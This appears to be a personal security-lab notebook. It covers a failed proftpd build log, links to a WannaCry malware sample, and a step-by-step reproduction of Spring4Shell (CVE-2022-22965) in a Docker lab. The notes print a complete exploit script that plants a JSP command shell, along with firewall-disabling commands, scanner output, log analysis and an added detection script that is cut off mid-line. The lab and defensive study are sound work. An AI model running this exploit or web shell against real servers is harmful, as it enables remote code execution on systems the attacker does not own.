mod_create_data(cmd, (void *) pwd->pw_uid) : DECLINED(cmd); | ^ mod_auth_file.c: In function ‘authfile_uid2name’: mod_auth_file.c:686:43: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 686 | pwd = af_getpwuid(af_current_user_file, (uid_t) cmd->argv[0]); | ^ mod_auth_file.c: In function ‘authfile_getgrgid’: mod_auth_file.c:719:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 719 | gid_t gid = (gid_t) cmd->argv[0]; | ^ mod_auth_file.c: In function ‘authfile_getgroups’: mod_auth_file.c:824:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 824 | return mod_create_data(cmd, (void *) gids->nelts); | ^ mod_auth_file.c:827:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 827 | return mod_create_data(cmd, (void *) groups->nelts); | ^ mod_auth_file.c: In function ‘authfile_gid2name’: mod_auth_file.c:842:44: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 842 | grp = af_getgrgid(af_current_group_file, (gid_t) cmd->argv[0]); | ^ mod_auth_file.c: In function ‘authfile_name2gid’: mod_auth_file.c:859:37: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 859 | return grp ? mod_create_data(cmd, (void *) grp->gr_gid) : DECLINED(cmd); | ^ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. 
-I../include -O2 -Wall -Wno-long-double -c mod_auth.c
mod_auth.c: In function ‘auth_count_scoreboard’:
mod_auth.c:1496:9: warning: variable ‘origuser’ set but not used [-Wunused-but-set-variable]
 1496 |   char *origuser, config_class_users[128] = {'\0'};
      |         ^~~~~~~~
mod_auth.c: In function ‘set_anonrejectpasswords’:
mod_auth.c:1993:15: warning: variable ‘c’ set but not used [-Wunused-but-set-variable]
 1993 |   config_rec *c = NULL;
      |               ^
At top level:
cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_ls.c
mod_ls.c: In function ‘listfile’:
mod_ls.c:447:13: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 8 has type ‘__off_t’ {aka ‘long int’} [-Wformat=]
  447 |             "%s %3d %-8s %-8s %8" PR_LU " %s %2d %s %s", m, (int) st.st_nlink,
      |             ^~~~~~~~~~~~~~~~~~~~~
  448 |             MAP_UID(st.st_uid), MAP_GID(st.st_gid), st.st_size,
      |                                                     ~~~~~~~~~~
      |                                                     |
      |                                                     __off_t {aka long int}
In file included from mod_ls.c:31:
../include/conf.h:309:20: note: format string is defined here
  309 | # define PR_LU "llu"
mod_ls.c:455:13: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 8 has type ‘__off_t’ {aka ‘long int’} [-Wformat=]
  455 |             "%s %3d %-8u %-8u %8" PR_LU " %s %2d %s %s", m, (int) st.st_nlink,
      |             ^~~~~~~~~~~~~~~~~~~~~
  456 |             (unsigned) st.st_uid, (unsigned) st.st_gid, st.st_size,
      |                                                         ~~~~~~~~~~
      |                                                         |
      |                                                         __off_t {aka long int}
../include/conf.h:309:20: note: format string is defined here
  309 | # define PR_LU "llu"
mod_ls.c: In function ‘listdir’:
mod_ls.c:825:17: warning: variable ‘ignore_hidden’ set but not used [-Wunused-but-set-variable]
  825 |   unsigned char ignore_hidden = FALSE;
      |                 ^~~~~~~~~~~~~
mod_ls.c: In function ‘listfile’:
mod_ls.c:437:49: warning: ‘%5d’ directive output may be truncated writing between 5 and 11 bytes into a region of size 6 [-Wformat-truncation=]
  437 |           snprintf(timeline, sizeof(timeline), "%5d", t->tm_year+1900);
      |                                                 ^~~
mod_ls.c:437:48: note: directive argument in the range [-2147481748, 2147483647]
  437 |           snprintf(timeline, sizeof(timeline), "%5d", t->tm_year+1900);
      |                                                ^~~~~
mod_ls.c:437:11: note: ‘snprintf’ output between 6 and 12 bytes into a destination of size 6
  437 |           snprintf(timeline, sizeof(timeline), "%5d", t->tm_year+1900);
      |           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In function ‘pop_cwd’,
    inlined from ‘nlstdir’ at mod_ls.c:1612:5:
mod_ls.c:155:3: warning: ‘symhold’ may be used uninitialized [-Wmaybe-uninitialized]
  155 |   pr_fsio_chdir(_cwd, *symhold);
      |   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mod_ls.c: In function ‘nlstdir’:
mod_ls.c:1465:17: note: ‘symhold’ was declared here
 1465 |   unsigned char symhold;
      |                 ^~~~~~~
At top level:
cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_log.c
mod_log.c: In function ‘get_next_meta’:
mod_log.c:550:35: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=]
  550 |     snprintf(argp, sizeof(arg), "%" PR_LU, session.xfer.total_bytes);
      |                                   ^~~      ~~~~~~~~~~~~~~~~~~~~~~~~
      |                                            |
      |                                            off_t {aka long int}
In file included from mod_log.c:31:
../include/conf.h:309:20: note: format string is defined here
  309 | # define PR_LU "llu"
At top level:
cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_site.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_cap.c
srcdir=. ./glue.sh mod_core.o mod_xfer.o mod_auth_unix.o mod_auth_file.o mod_auth.o mod_ls.o mod_log.o mod_site.o mod_cap.o
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c module_glue.c
make[1]: Leaving directory '/home/iris/Downloads/proftpd-1.2.9/modules'
make[1]: Entering directory '/home/iris/Downloads/proftpd-1.2.9/lib/libcap'
=> making cap_names.c from <linux/capability.h>
cc -O2 -Wall -Wno-long-double -Llib _makenames.c -o _makenames
./_makenames > cap_names.h
cc -O2 -Wall -Wno-long-double -c cap_alloc.c -o cap_alloc.o
cc -O2 -Wall -Wno-long-double -c cap_proc.c -o cap_proc.o
cc -O2 -Wall -Wno-long-double -c cap_extint.c -o cap_extint.o
cc -O2 -Wall -Wno-long-double -c cap_flag.c -o cap_flag.o
cc -O2 -Wall -Wno-long-double -c cap_text.c -o cap_text.o
cc -O2 -Wall -Wno-long-double -c cap_sys.c -o cap_sys.o
cap_sys.c:14:16: error: expected declaration specifiers or ‘...’ before ‘capget’
   14 | _syscall2(int, capget,
      |                ^~~~~~
cap_sys.c:15:30: error: unknown type name ‘header’
   15 |           cap_user_header_t, header,
      |                              ^~~~~~
cap_sys.c:16:28: error: unknown type name ‘data’
   16 |           cap_user_data_t, data)
      |                            ^~~~
cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics
make[1]: *** [Makefile:43: cap_sys.o] Error 1
make[1]: Leaving directory '/home/iris/Downloads/proftpd-1.2.9/lib/libcap'
make: *** [Makefile:46: dirs] Error 2
```

Error screenshot

![image](https://hackmd.io/_uploads/SJEwwM5eC.png)

The warnings in `modules/` are harmless; the build actually stops in the bundled `lib/libcap`, whose `cap_sys.c` declares `capget` through the old kernel `_syscall2()` macro. Current Linux/glibc headers no longer provide that macro, so this 2003-era source tree will not compile unmodified on a modern system.

# Windows WannaCry (EternalBlue), RCE

### Not run by downloading the malware binary itself

Malware sample:

* [limiteci/WannaCry](https://github.com/limiteci/WannaCry)

Related articles:

* [Demystifying WannaCry: A Deep Dive into Malware Analysis](https://medium.com/@s.shrimeenaakshi/demystifying-wannacry-a-deep-dive-into-malware-analysis-03a10a0b1f40)
* [HuskyHacks / PMAT-labs](https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/4-1.Bossfight-wannacry.exe)

Connect to the Kali instance on EC2:

`ssh -i "C:\Users\iris.yu\Downloads\VMKali.pem" kali@ec2-54-149-82-215.us-west-2.compute.amazonaws.com`

Edit the OSSEC/Wazuh custom rules file:

`nano /var/ossec/etc/rules/local_rules.xml`

---

# Spring4Shell CVE-2022-22965

[[Vulnerability analysis] 002 Reproducing Spring4Shell: Spring Core RCE JDK 9+
CVE-2022-22965](https://feifei.tw/springshell-spring-core-rce/)

## Check connectivity and disable the firewall

* Disable the firewall (flush every rule and chain, then set the default policy of INPUT, FORWARD and OUTPUT to ACCEPT)

```
┌──(root㉿kali)-[/home/iris/Downloads]
└─# sudo iptables -F

┌──(root㉿kali)-[/home/iris/Downloads]
└─# sudo iptables -X

┌──(root㉿kali)-[/home/iris/Downloads]
└─# sudo iptables -P INPUT ACCEPT

┌──(root㉿kali)-[/home/iris/Downloads]
└─# sudo iptables -P FORWARD ACCEPT

┌──(root㉿kali)-[/home/iris/Downloads]
└─# sudo iptables -P OUTPUT ACCEPT
```

Caveat: the container is published on `0.0.0.0:8066` (see `netstat` below), so once the host's own filtering is gone nothing on the VM restricts access to a deliberately vulnerable application; on a cloud instance only the security group still does.

* Check listening ports / ping

```
┌──(root㉿kali)-[/home/iris/Downloads]
└─# netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:46619         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:8066            0.0.0.0:*               LISTEN
tcp6       0      0 ::1:3350                :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 :::8066                 :::*                    LISTEN
tcp6       0      0 :::3389                 :::*                    LISTEN
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp6       0      0 fe80::449:30ff:fe6c:546 :::*

┌──(root㉿kali)-[/home/iris/Downloads]
└─# ping 172.104.100.165
PING 172.104.100.165 (172.104.100.165) 56(84) bytes of data.
64 bytes from 172.104.100.165: icmp_seq=1 ttl=48 time=125 ms
64 bytes from 172.104.100.165: icmp_seq=2 ttl=48 time=125 ms
```

## Problem found

* The target URL should be http://127.104.100.165:8066/
* not http://172.104.100.165:8066/

The whole of 127.0.0.0/8 is loopback, so 127.104.100.165:8066 reaches the port Docker published on this host. 172.104.100.165 is an unrelated public host (the ping above gets answers from it with ttl=48), not the machine the container runs on.

## Overall procedure

### Pull the docker image

`docker pull vulfocus/spring-core-rce-2022-03-29:latest`

### Run it with host port 8066 mapped to container port 8080

* Opening the site and seeing `ok` means it is running

`docker run -p 8066:8080 vulfocus/spring-core-rce-2022-03-29:latest`

![image](https://hackmd.io/_uploads/Bkw-ODclC.png)

### Download the attack script

`wget https://raw.githubusercontent.com/dinosn/spring-core-rce/main/test.py`

### Run the attack script

`python3 test.py --url http://127.104.100.165:8066/`

```python
#coding:utf-8
import requests
import argparse
from urllib.parse import urljoin


def Exploit(url):
    # The JSP fragments that must not appear literally in the log pattern are
    # smuggled in as request headers: Tomcat's AccessLogValve expands
    # %{c1}i / %{c2}i / %{suffix}i to these header values when it writes a log line.
    headers = {"suffix": "%>//",
               "c1": "Runtime",
               "c2": "<%",
               "DNT": "1",
               "Content-Type": "application/x-www-form-urlencoded"
               }
    # Through Spring's data binder, the property path
    # class.module.classLoader.resources.context.parent.pipeline.first
    # reaches the AccessLogValve of the Tomcat context. The five properties
    # below make it write webapps/ROOT/tomcatwar.jsp (prefix + empty
    # fileDateFormat + suffix) whose content, the "pattern", is a command shell.
    data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    try:
        go = requests.post(url, headers=headers, data=data, timeout=15, allow_redirects=False, verify=False)
        # Fetch the dropped JSP; a 200 means the shell now exists on the target.
        shellurl = urljoin(url, 'tomcatwar.jsp')
        shellgo = requests.get(shellurl, timeout=15, allow_redirects=False, verify=False)
        if shellgo.status_code == 200:
            print(f"Vulnerable, shell at: {shellurl}?pwd=j&cmd=whoami")
    except Exception as e:
        print(e)


def main():
    parser = argparse.ArgumentParser(description='Spring-Core RCE.')
    parser.add_argument('--file', help='url file', required=False)
    parser.add_argument('--url', help='target url', required=False)
    args = parser.parse_args()
    if args.url:
        Exploit(args.url)
    if args.file:
        with open(args.file) as f:
            for i in f.readlines():
                i = i.strip()
                Exploit(i)


if __name__ == '__main__':
    main()
```

### Observe the exploit

URL: `http://127.104.100.165:8066/tomcatwar.jsp?pwd=j&cmd=whoami`

![image](https://hackmd.io/_uploads/S1C__D5e0.png)

# Related material

[Fix information: spring-projects/spring-framework tags](https://github.com/spring-projects/spring-framework/tags)

![image](https://hackmd.io/_uploads/HJfjpDqxC.png)

# Log hunt

* Open the config file: `sudo nano /etc/apache2/apache2.conf`
* In nano, add `CustomLog ${APACHE_LOG_DIR}/access.log combined`

![image](https://hackmd.io/_uploads/H183N_9l0.png)

* Restart apache: `sudo systemctl restart apache2`
* Access log: `sudo cat /var/log/apache2/access.log`
* Error log: `sudo cat /var/log/apache2/error.log`
* Check status: `sudo systemctl status apache2`

![image](https://hackmd.io/_uploads/B1iWM_ce0.png)

* List all log files: `ls /var/log/`

```
──(kali㉿kali)-[~]
└─$ ls /var/log/
README            clamav                 faillog         lastlog          private           sysstat
alternatives.log  cloud-init-output.log  fontconfig.log  lightdm          redis             tiger
apache2           cloud-init.log         freeradius      lighttpd         redsnarf          tor
apt               cron.log               freeradius-wpe  macchanger.log   runit             unattended-upgrades
auth.log          defectdojo             gvm             mosquitto        samba             user.log
blue_hydra        dpkg.log               hostapd-wpe     nginx            snort             wtmp
boot.log          dradis                 inetsim         notus-scanner    speech-dispatcher xrdp-sesman.log
btmp              eaphammer              journal         openvpn          stunnel4          xrdp.log
chkrootkit        exim4                  kern.log        postgresql       syslog
```

![image](https://hackmd.io/_uploads/BJIc9_9g0.png)

## Error/Access log checking

The error log holds two messages: the first (AH00163) is Apache's notice that configuration finished and it resumed normal operation; the second (AH00094) records the command line of the Apache main process.

```
┌──(root㉿kali)-[/var/log/apache2]
└─# sudo cat /var/log/apache2/error.log
[Mon Apr 15 09:21:04.055498 2024] [mpm_prefork:notice] [pid 251144] AH00163: Apache/2.4.58 (Debian) configured -- resuming normal operations
[Mon Apr 15 09:21:04.055553 2024] [core:notice] [pid 251144] AH00094: Command line: '/usr/sbin/apache2'
```

![image](https://hackmd.io/_uploads/rJ89HOqlA.png)

Note that apache2 on the host never sees the exploit traffic: requests to port 8066 go straight to the container, so the host's `access.log` stays empty of them and the useful output is the container's own (`docker logs`).

## Also download [fullhunt/spring4shell-scan](https://github.com/fullhunt/spring4shell-scan)

```
git clone https://github.com/fullhunt/spring4shell-scan.git
cd spring4shell-scan
sudo docker build -t spring4shell-scan .
sudo docker run -it --rm spring4shell-scan

# With URL list "urls.txt" in current directory
docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt
```

* Run the scanner: `python3 spring4shell-scan.py -u http://127.104.100.165:8066/`
* Scan output (vulnerable)

```
┌──(root㉿kali)-[/home/iris/Downloads/spring4shell-scan/spring4shell-scan]
└─# python3 spring4shell-scan.py -u http://127.104.100.165:8066/
[•] CVE-2022-22965 - Spring4Shell RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] URL: http://127.104.100.165:8066/
[%] Checking for Spring4Shell RCE CVE-2022-22965.
[•] URL: http://127.104.100.165:8066/ | PAYLOAD: class.module.classLoader[iv1jdve]=iv1jdve
[!!!] Target Affected (CVE-2022-22965)
[!] Total Vulnerable Hosts: 1
[!] http://127.104.100.165:8066/
```

![image](https://hackmd.io/_uploads/S1aT_O5lC.png)

## Docker log

`docker ps`: find the container ID

![image](https://hackmd.io/_uploads/BJsmRi2gA.png)

```
┌──(root㉿kali)-[/home/iris/Downloads]
└─# docker ps
CONTAINER ID   IMAGE                                        COMMAND                  CREATED         STATUS         PORTS                                       NAMES
233ab001aa5a   vulfocus/spring-core-rce-2022-03-29:latest   "/app/tomcat/bin/cat…"   3 minutes ago   Up 3 minutes   0.0.0.0:8066->8080/tcp, :::8066->8080/tcp   distracted_joliot
```

### Found the log! 😂

`docker logs 233ab001aa5a`

![image](https://hackmd.io/_uploads/HkgZCihxA.png)

```
┌──(root㉿kali)-[/home/iris/Downloads]
└─# docker logs 233ab001aa5a
NOTE: Picked up JDK_JAVA_OPTIONS: --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED
17-Apr-2024 01:55:52.641 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server version name:   Apache Tomcat/8.5.77
17-Apr-2024 01:55:52.647 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server built:          Mar 13 2022 19:13:33 UTC
17-Apr-2024 01:55:52.647 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server version number: 8.5.77.0
17-Apr-2024 01:55:52.648 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log OS Name:               Linux
17-Apr-2024 01:55:52.648 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log OS Version:            6.6.9-cloud-amd64
17-Apr-2024 01:55:52.649 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Architecture:          amd64
17-Apr-2024 01:55:52.649 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Java Home:             /app/jdk9
17-Apr-2024 01:55:52.650 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Version:           9.0.4+11
17-Apr-2024 01:55:52.650 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Vendor:            Oracle Corporation
17-Apr-2024 01:55:52.650 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE:         /app/tomcat
17-Apr-2024 01:55:52.651 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME:         /app/tomcat
17-Apr-2024 01:55:52.656 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.lang=ALL-UNNAMED
17-Apr-2024 01:55:52.658 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.io=ALL-UNNAMED
17-Apr-2024 01:55:52.659 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.util=ALL-UNNAMED
17-Apr-2024 01:55:52.659 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.base/java.util.concurrent=ALL-UNNAMED
17-Apr-2024 01:55:52.660 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED
17-Apr-2024 01:55:52.660 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.util.logging.config.file=/app/tomcat/conf/logging.properties
17-Apr-2024 01:55:52.661 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
17-Apr-2024 01:55:52.662 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djdk.tls.ephemeralDHKeySize=2048
17-Apr-2024 01:55:52.662 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.protocol.handler.pkgs=org.apache.catalina.webresources
17-Apr-2024 01:55:52.663 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dorg.apache.catalina.security.SecurityListener.UMASK=0027
17-Apr-2024 01:55:52.665 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dignore.endorsed.dirs=
17-Apr-2024 01:55:52.665 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dcatalina.base=/app/tomcat
17-Apr-2024 01:55:52.666 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dcatalina.home=/app/tomcat
17-Apr-2024 01:55:52.666 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Djava.io.tmpdir=/app/tomcat/temp
17-Apr-2024 01:55:52.666 INFO [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent The Apache Tomcat Native library which allows using OpenSSL was not found on the java.library.path: [/usr/java/packages/lib:/usr/lib64:/lib64:/lib:/usr/lib]
17-Apr-2024 01:55:52.729 INFO [main] org.apache.coyote.AbstractProtocol.init Initializing ProtocolHandler ["http-nio-8080"]
17-Apr-2024 01:55:52.788 INFO [main] org.apache.catalina.startup.Catalina.load Initialization processed in 1092 ms
17-Apr-2024 01:55:52.891 INFO [main] org.apache.catalina.core.StandardService.startInternal Starting service [Catalina]
17-Apr-2024 01:55:52.892 INFO [main] org.apache.catalina.core.StandardEngine.startInternal Starting Servlet engine: [Apache Tomcat/8.5.77]
17-Apr-2024 01:55:52.917 INFO [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployWAR Deploying web application archive [/app/tomcat/webapps/ROOT.war]
17-Apr-2024 01:55:54.681 INFO [localhost-startStop-1] org.apache.jasper.servlet.TldScanner.scanJars At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
  .   ____          _            __ _ _
 /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
 \\/  ___)| |_)| | | | || (_| |  ) ) ) )
  '  |____| .__|_| |_|_| |_\__, | / / / /
 =========|_|==============|___/=/_/_/_/
 :: Spring Boot ::                (v2.6.5)

2024-04-17 01:55:55.694  INFO 1 --- [ost-startStop-1] c.b.spring.core.rce.ServletInitializer   : Starting ServletInitializer v0.0.1-SNAPSHOT using Java 9.0.4 on 233ab001aa5a with PID 1 (/app/tomcat/webapps/ROOT/WEB-INF/classes started by root in /)
2024-04-17 01:55:55.700  INFO 1 --- [ost-startStop-1] c.b.spring.core.rce.ServletInitializer   : No active profile set, falling back to 1 default profile: "default"
2024-04-17 01:55:56.941  INFO 1 --- [ost-startStop-1] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 1103 ms
2024-04-17 01:55:57.833  INFO 1 --- [ost-startStop-1] c.b.spring.core.rce.ServletInitializer   : Started ServletInitializer in 2.884 seconds (JVM running for 6.708)
17-Apr-2024 01:55:57.871 INFO [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployWAR Deployment of web application archive [/app/tomcat/webapps/ROOT.war] has finished in [4,953] ms
17-Apr-2024 01:55:57.874 INFO [main] org.apache.coyote.AbstractProtocol.start Starting ProtocolHandler ["http-nio-8080"]
17-Apr-2024 01:55:57.894 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in 5105 ms
2024-04-17 01:59:00.609  INFO 1 --- [nio-8080-exec-1] o.s.web.servlet.DispatcherServlet        : Initializing Servlet 'dispatcherServlet'
2024-04-17 01:59:00.615  INFO 1 --- [nio-8080-exec-1] o.s.web.servlet.DispatcherServlet        : Completed initialization in 1 ms
```

What this shows is the application's stdout, not a per-request access log: the startup banner, then the `DispatcherServlet` initialising at 01:59:00, which Spring Boot does lazily on the first request, i.e. when the scanner or exploit was first run. The requests themselves are not listed here.

# Set up a separate attacker (attacker and target on different machines)

## Confirm the LAN

![image](https://hackmd.io/_uploads/HyjNsgTx0.png)

```
┌──(root㉿kali)-[/home/kali]
└─# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 06:49:30:6c:4b:f1 brd ff:ff:ff:ff:ff:ff
    inet 172.31.42.131/20 brd 172.31.47.255 scope global dynamic eth0
       valid_lft 2347sec preferred_lft 2347sec
    inet6 fe80::449:30ff:fe6c:4bf1/64 scope link proto kernel_ll
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:71:04:aa:71 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:71ff:fe04:aa71/64 scope link proto kernel_ll
       valid_lft forever preferred_lft forever
5: veth98a3814@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
    link/ether c2:63:3a:71:1a:1d brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::c063:3aff:fe71:1a1d/64 scope link proto kernel_ll
       valid_lft forever preferred_lft forever
```

Pinged successfully:

* 172.31.42.131

![image](https://hackmd.io/_uploads/B10ohgpe0.png)

# Studying the code

* [Spring 远程命令执行漏洞(CVE-2022-22965)原理分析和思考 (Spring RCE, CVE-2022-22965: root-cause analysis)](https://paper.seebug.org/1877/)
* [CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)](https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/)

## Rebuilding the environment

* `docker ps`: look up the CONTAINER_ID
* `docker stop <CONTAINER_ID>`: stop the container
* `docker rm <CONTAINER_ID>`: delete the container
* `docker rmi <IMAGE_ID>`: remove the image (by ID, or by its full name such as `vulfocus/spring-core-rce-2022-03-29:latest`)

```
┌──(root㉿kali)-[/home/iris]
└─# docker stop 884aefa286ca
884aefa286ca

┌──(root㉿kali)-[/home/iris]
└─# docker rm 884aefa286ca
884aefa286ca

┌──(root㉿kali)-[/home/iris]
└─# docker rmi spring-core-rce-2022-03-29:latest
```

## Before the attack

The timeline shows 2024 08:35

![image](https://hackmd.io/_uploads/r1-3o-Te0.png)

## After the attack from the Ubuntu attacker machine

The timeline shows 2024 08:36

![image](https://hackmd.io/_uploads/SkHPs-axC.png)

* Target screen, showing the remote attack succeeded

![image](https://hackmd.io/_uploads/Hydx3ZTeA.png)

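The test.py script and the log hunt above raise two questions a practitioner wants answered: what exactly does the POST body make Tomcat do, and what of it would ever show up in an access log. The following is an added example written for these notes (it is not code from the original page, from dinosn/spring-core-rce or from Spring/Tomcat). It decodes test.py's body into the AccessLogValve properties it sets and renders the JSP that lands on disk, then tags indicators in combined-format access log lines. The log lines are constructed sample data, the combined format is the one enabled with `CustomLog ... combined` above, and the function names are this example's own.

```python
"""Added example, not code from the original notes or from dinosn/spring-core-rce:
decode what test.py's POST body asks Tomcat's AccessLogValve to do, and flag
Spring4Shell traces in combined-format access log lines. The log lines are
constructed sample data; function names are this example's own."""
import re
from urllib.parse import parse_qs, unquote

# POST body and the three payload headers, copied from test.py.
PAYLOAD_BODY = (
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
    "%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20"
    "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec("
    "request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20"
    "byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)"
    "%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di"
    "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
    "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
    "&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar"
    "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
)
PAYLOAD_HEADERS = {"suffix": "%>//", "c1": "Runtime", "c2": "<%"}

# Property path Spring's data binder walks from the bound bean down to the
# first valve of the Tomcat context pipeline (the AccessLogValve).
VALVE_PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."


def valve_properties(body: str) -> dict:
    """Map AccessLogValve property -> value for every field the body sets.
    keep_blank_values matters: the empty fileDateFormat is what makes the
    log file name exactly prefix + suffix."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k[len(VALVE_PREFIX):]: v[0]
            for k, v in fields.items() if k.startswith(VALVE_PREFIX)}


def render_jsp(pattern: str, headers: dict) -> str:
    """Expand %{name}i tokens (request-header lookups in AccessLogValve
    pattern syntax), which is how the log entry becomes JSP source."""
    return re.sub(r"%\{(\w+)\}i", lambda m: headers[m.group(1)], pattern)


def dropped_file(props: dict) -> str:
    """Path the valve writes to: directory/prefix + dateStamp + suffix."""
    return "{directory}/{prefix}{fileDateFormat}{suffix}".format(**props)


# Apache "combined" log format; only the request line and status are needed.
COMBINED = re.compile(
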